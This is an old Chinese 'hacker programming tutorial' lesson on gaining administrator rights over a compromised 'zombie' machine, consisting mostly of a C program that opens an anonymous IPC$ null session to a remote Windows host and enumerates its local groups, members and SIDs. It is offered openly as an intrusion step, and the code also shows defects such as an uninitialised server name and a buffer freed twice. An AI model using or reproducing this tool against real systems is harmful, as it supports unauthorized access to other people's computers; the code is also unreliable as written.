黑客编程教程（十二）取得系统拥护权限

                                          第十二节 取得系统拥护权限   我们要取得肉鸡的控制权,首先必须有Administrator权限,获得权限的途径很多都是通过IPC$破解来获得用户密码.我们看一下代码:#include <windows.h>#include <stdio.h>#include <lm.h>#pragma comment (lib, "Mpr.lib")#pragma comment (lib, "Netapi32.lib")void getuser(char *);void main( int argc, char *argv[ ] ){           //空用户名和密码DWORD ret;char username[100] = "", password[100] = "";char server[100] = "", ipc[100] = "";NETRESOURCE NET;if (argc == 1) { exit(1);}strncpy(server,argv[1],100); printf("server: %s\n", server);sprintf(ipc,"\\\\%s\\ipc$",server);NET.lpLocalName = NULL;NET.lpProvider = NULL;NET.dwType = RESOURCETYPE_ANY;NET.lpRemoteName = (char*)&ipc;printf("setting up session... ");ret = WNetAddConnection2(&NET,(const char *)&password,(const char *)&username,0);                                                                         //建立空连接if (ret != ERROR_SUCCESS){printf("IPC$ connect fail.\n");exit(1);}else printf("IPC$ connect success.\n");getuser((char*)&server);printf("Disconnect Server... ");ret = WNetCancelConnection2((char*)&ipc,0,TRUE);                     //断开IPC连接if (ret != ERROR_SUCCESS){printf("fail.\n");exit(1);}else printf("success.\n");exit (0);}void getuser(char *server)                      //取得用户的函数{DWORD ret, read, total, resume = 0;int i;LPVOID buff;char comment[255];wchar_t wserver[100];do {ret = NetLocalGroupEnum(wserver, 1, (unsigned char **)&buff, MAX_PREFERRED_LENGTH, &read, &total, &resume);if (ret != NERR_Success && ret != ERROR_MORE_DATA) {printf("fail\n");break;} PLOCALGROUP_INFO_1 info = (PLOCALGROUP_INFO_1) buff;for (i=0; i<read; i++) {printf("GROUP: %S\n",info[i].lgrpi1_name);WideCharToMultiByte(CP_ACP, 0, info[i].lgrpi1_comment , -1, comment,255,NULL,NULL); printf("\tCOMMENT: %s\n",comment);DWORD ret, read, total, resume = 0;ret = NetLocalGroupGetMembers((const unsigned short*)&wserver, info[i].lgrpi1_name, 2, (unsigned char **)&buff, 1024, &read, &total, &resume);if (ret != NERR_Success && ret != ERROR_MORE_DATA) {printf("fail\n");break;} PLOCALGROUP_MEMBERS_INFO_2 info = (PLOCALGROUP_MEMBERS_INFO_2) buff;for (unsigned i=0; i<read; i++) {printf("\t\t%S\n", info[i].lgrmi2_domainandname);printf("\t\t\tSID:%d\n", info[i].lgrmi2_sid);printf("\t\t\tSIDUSAGE:%d\n",info[i].lgrmi2_sidusage);}NetApiBufferFree (buff);}NetApiBufferFree (buff);} while (ret == ERROR_MORE_DATA );}